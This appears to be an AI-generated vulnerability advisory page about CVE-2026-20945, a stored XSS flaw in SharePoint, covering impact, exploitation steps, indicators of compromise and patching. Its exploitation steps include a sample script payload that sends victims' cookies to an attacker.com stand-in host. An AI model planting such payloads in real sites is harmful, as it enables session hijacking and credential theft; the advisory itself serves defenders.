CVE-2026-20945
vulnerability analysis and mitigation

Overview

CVE-2026-20945 is a stored cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint that allows an authenticated attacker with low-privilege access to perform spoofing attacks over a network. The vulnerability was disclosed on April 14, 2026, as part of Microsoft's April 2026 Patch Tuesday security update. Affected products include Microsoft SharePoint Server Subscription Edition (versions prior to 16.0.19725.20210), Microsoft SharePoint Enterprise Server 2016 (versions prior to 16.0.5548.1003), and Microsoft SharePoint Server 2019 (versions prior to 16.0.10417.20114). The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Microsoft MSRC).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), arising from insufficient sanitization of user-supplied input before it is rendered in SharePoint web pages. An authenticated attacker with low privileges can inject malicious scripts that are stored and later executed in the browsers of other users who view the affected content, enabling spoofing attacks. Exploitation requires user interaction (a victim must view the attacker-controlled content) and network access, but does not require elevated privileges beyond a standard authenticated account. Associated attack patterns include stored XSS (CAPEC-592), reflected XSS (CAPEC-591), and DOM-based XSS (CAPEC-588) (Microsoft MSRC).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, resulting in low-impact confidentiality and integrity compromise (e.g., session token theft, credential harvesting, or UI redirection/spoofing). Availability is not impacted. Because the vulnerability is stored (persistent), a single injection can affect multiple users who subsequently visit the compromised SharePoint page, potentially enabling broader phishing or lateral movement within an organization's SharePoint environment (Microsoft MSRC).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Microsoft MSRC). The EPSS score is approximately 0.058%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Reconnaissance: Identify a target SharePoint Server instance (2016, 2019, or Subscription Edition) running a vulnerable version (prior to the April 2026 patch) using network scanning or OSINT.
  2. Authentication: Obtain or use any low-privilege authenticated account on the SharePoint deployment (e.g., a standard domain user with SharePoint access).
  3. Inject malicious payload: Navigate to a SharePoint page or feature that accepts user-generated content (e.g., a list item, wiki page, or web part) and submit a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in an input field that is not properly sanitized.
  4. Payload persistence: The malicious script is stored server-side and rendered to any user who subsequently views the affected SharePoint content.
  5. Victim interaction: When a target user (e.g., an administrator or privileged user) visits the compromised page, the injected script executes in their browser, enabling session hijacking, credential theft, or spoofing of SharePoint UI elements.
  6. Post-exploitation: Use harvested session tokens or credentials to escalate access within the SharePoint environment or connected systems (Microsoft MSRC).

Indicators of compromise

  • Logs: SharePoint ULS logs or IIS access logs showing unusual POST requests to SharePoint list or page endpoints containing encoded script tags (e.g., %3Cscript%3E, javascript:, onerror=) in input fields.
  • Network: Outbound HTTP/S requests from SharePoint users' browsers to unexpected external domains shortly after viewing specific SharePoint pages, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected modifications to SharePoint page content or list items containing embedded <script> tags or event handler attributes (e.g., onload, onerror, onmouseover).
  • Logs: Browser-side console errors or Content Security Policy (CSP) violation reports referencing unexpected script sources originating from SharePoint pages.

Mitigation and workarounds

Microsoft released security updates on April 14, 2026, addressing this vulnerability. Organizations should apply the following patched versions: SharePoint Server Subscription Edition (16.0.19725.20210 or later), SharePoint Enterprise Server 2016 (16.0.5548.1003 or later), and SharePoint Server 2019 (16.0.10417.20114 or later). No specific configuration-based workaround has been published; upgrading to the patched version is the recommended remediation. As a defense-in-depth measure, organizations should enforce Content Security Policy (CSP) headers and restrict SharePoint content editing permissions to trusted users (Microsoft MSRC).

Community reactions

The vulnerability was covered as part of broader April 2026 Patch Tuesday roundups by security outlets including BleepingComputer, Tenable, Zero Day Initiative (ZDI), and Lansweeper, which collectively noted the large patch volume (163–167 CVEs addressed) but did not single out CVE-2026-20945 as a high-priority concern given its medium severity rating (BleepingComputer, Tenable, ZDI). CyberSecurity Dive published a brief noting the medium-severity SharePoint flaw. No significant researcher commentary or social media controversy was observed specific to this CVE.

Additional resources


SourceThis report was generated using AI

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management